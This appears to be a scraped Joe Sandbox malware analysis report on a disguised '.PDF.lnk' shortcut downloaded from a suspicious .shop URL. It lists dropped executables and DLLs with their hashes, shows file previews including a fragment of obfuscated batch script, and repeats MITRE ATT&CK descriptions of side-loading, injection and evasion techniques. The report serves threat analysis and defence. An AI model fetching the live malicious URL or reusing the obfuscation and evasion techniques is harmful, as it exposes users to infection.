Preview:	Set Submitting=1..LHEnough-..UEEncoding-..VKDatabases-Waste-Yemen-Pairs-Aaron-Introduce-Whatever-Franklin-Nominations-..vHjDealt-Tuition-Configured-Return-Kitty-Enough-Thumb-..baaTool-Celebrate-Administration-Montreal-Spoken-Sugar-Network-..Set Parliamentary=T..PgNecessarily-Cindy-Carriers-Necessity-Colon-Yen-Spears-Will-Mhz-..xHYConfidence-Agriculture-Submitting-Credit-Welding-Op-..ixConst-Lyrics-People-Say-Grip-Yn-Streams-Admission-Nutten-..IBErik-Larger-Bon-Wants-Marijuana-Score-Member-Lit-Inventory-..LrHit-Thoroughly-Simulation-Percentage-..bNlxFifth-Arctic-Msgid-Million-Lancaster-Gentle-..Set Inserted=n..zHVkTracking-Browsers-New-Counting-..rumPar-Un-Amount-..yadAdministrator-..BKAMachines-T-Allowance-Msg-Gale-Scan-..cKPComputational-Select-Destiny-..UfhkLottery-Janet-Workout-Respondents-Broken-Snapshot-Intel-Gamecube-Organisation-..Set Hits=u..mtInfectious-Nav-Au-Pavilion-Moreover-Approximately-..EJOESuppliers-Her-Smile-William-..sWtHFence-Haiti-Scientific-Legislation-Uw-Only-..o

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.092645826002751
Encrypted:	false
SSDEEP:
MD5:	DB48B8BADECB97A3EB892D9C1BDA9737
SHA1:	33AC5F03F754827AB65E88536369366558E247DA
SHA-256:	C9FD559C7377512E220141459F5BE85D1B5CF2FFD8150CC0AAB101C85D6DDEDD
SHA-512:	83A9F6F093A6CDD9311297251D6BD13BE5591B6B4827290DAFB2B9F17B8644A3F83DFB8B7D3AD9BEF80F21E79F9567C408F159FA5494F504D6DF337E1644AE21
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.v.4.4.v.i.s.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.v.4.4.v.i.s.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 11 17:12:56 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.985873614550176
Encrypted:	false
SSDEEP:
MD5:	BFF6CD94DB283BEBCA6BD8ED957FD69A
SHA1:	8E701CE5188C2E541CF0C2916802B4BF952DB771
SHA-256:	AD2A336B26312D7C057EF24BF6F6688A8582F983F427C437B56414245E2EB18C
SHA-512:	241692D4866A66C186EBBE881AA96C941787843A8CE1864A7AEE731B2AA6FD4FD7D8B8F962D53B21FAA3EF12E8CE3D6E40B1D1C1C2379AD00F522656D6E5BA0C
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....M..M.K......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y......B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........$.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	4926
Entropy (8bit):	3.244344789506008
Encrypted:	false
SSDEEP:
MD5:	4DCF7410BD0414C01B7D3A569D16CA37
SHA1:	9E23DBD3F951692F23BC1D9EB56DA4E23F95DA90
SHA-256:	E6B216224A360BE81DF75B63B90AA0685DC04431760516B0122ECE2FDC3FAC0A
SHA-512:	0FA4C863630EC16090F456C3EB7EFBEC709BCBE51E580876E06F4EADCA062247D2745E4714D0E17486EA1798E2B7264B3D5793D89BD68772CD36E8E0B180145F
Malicious:	false
Reputation:	unknown
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. O.c.t. .. 0.6. .. 2.0.2.3. .1.2.:.3.4.:.5.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e........................................ .W.S.C. .S.t.a.t.e. .I.n.f.o. ................................................................. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. ..............................d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop/Documents/Instruction_695-18014-012_Rev.PDF.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Dropped Files

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\63c344f8-adac-437b-b839-a8764de6e861.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241211181358Z-194.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\EdgarMales.exe

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\MOG_Framework_2.2.14_vc10.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\Microsoft.AspNetCore.Razor.Language.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\Microsoft.Azure.Management.Storage.Fluent.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\Microsoft.NET.Sdk.Publish.Tasks.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\Microsoft.TestPlatform.VsTestConsole.TranslationLayer.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\Microsoft.VisualStudio.Setup.Download.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\Microsoft.VisualStudio.VisualC.Utilities.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\WRServices.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\WzWXFmfire64.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\_Fs.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\libmp4_plugin.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\mc_dec_mp2v.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\mc_mfimport.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\mlib_image.dll

C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\msvcp80.dll

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Windows Analysis Report
https://download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop/Documents/Instruction_695-18014-012_Rev.PDF.lnk

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre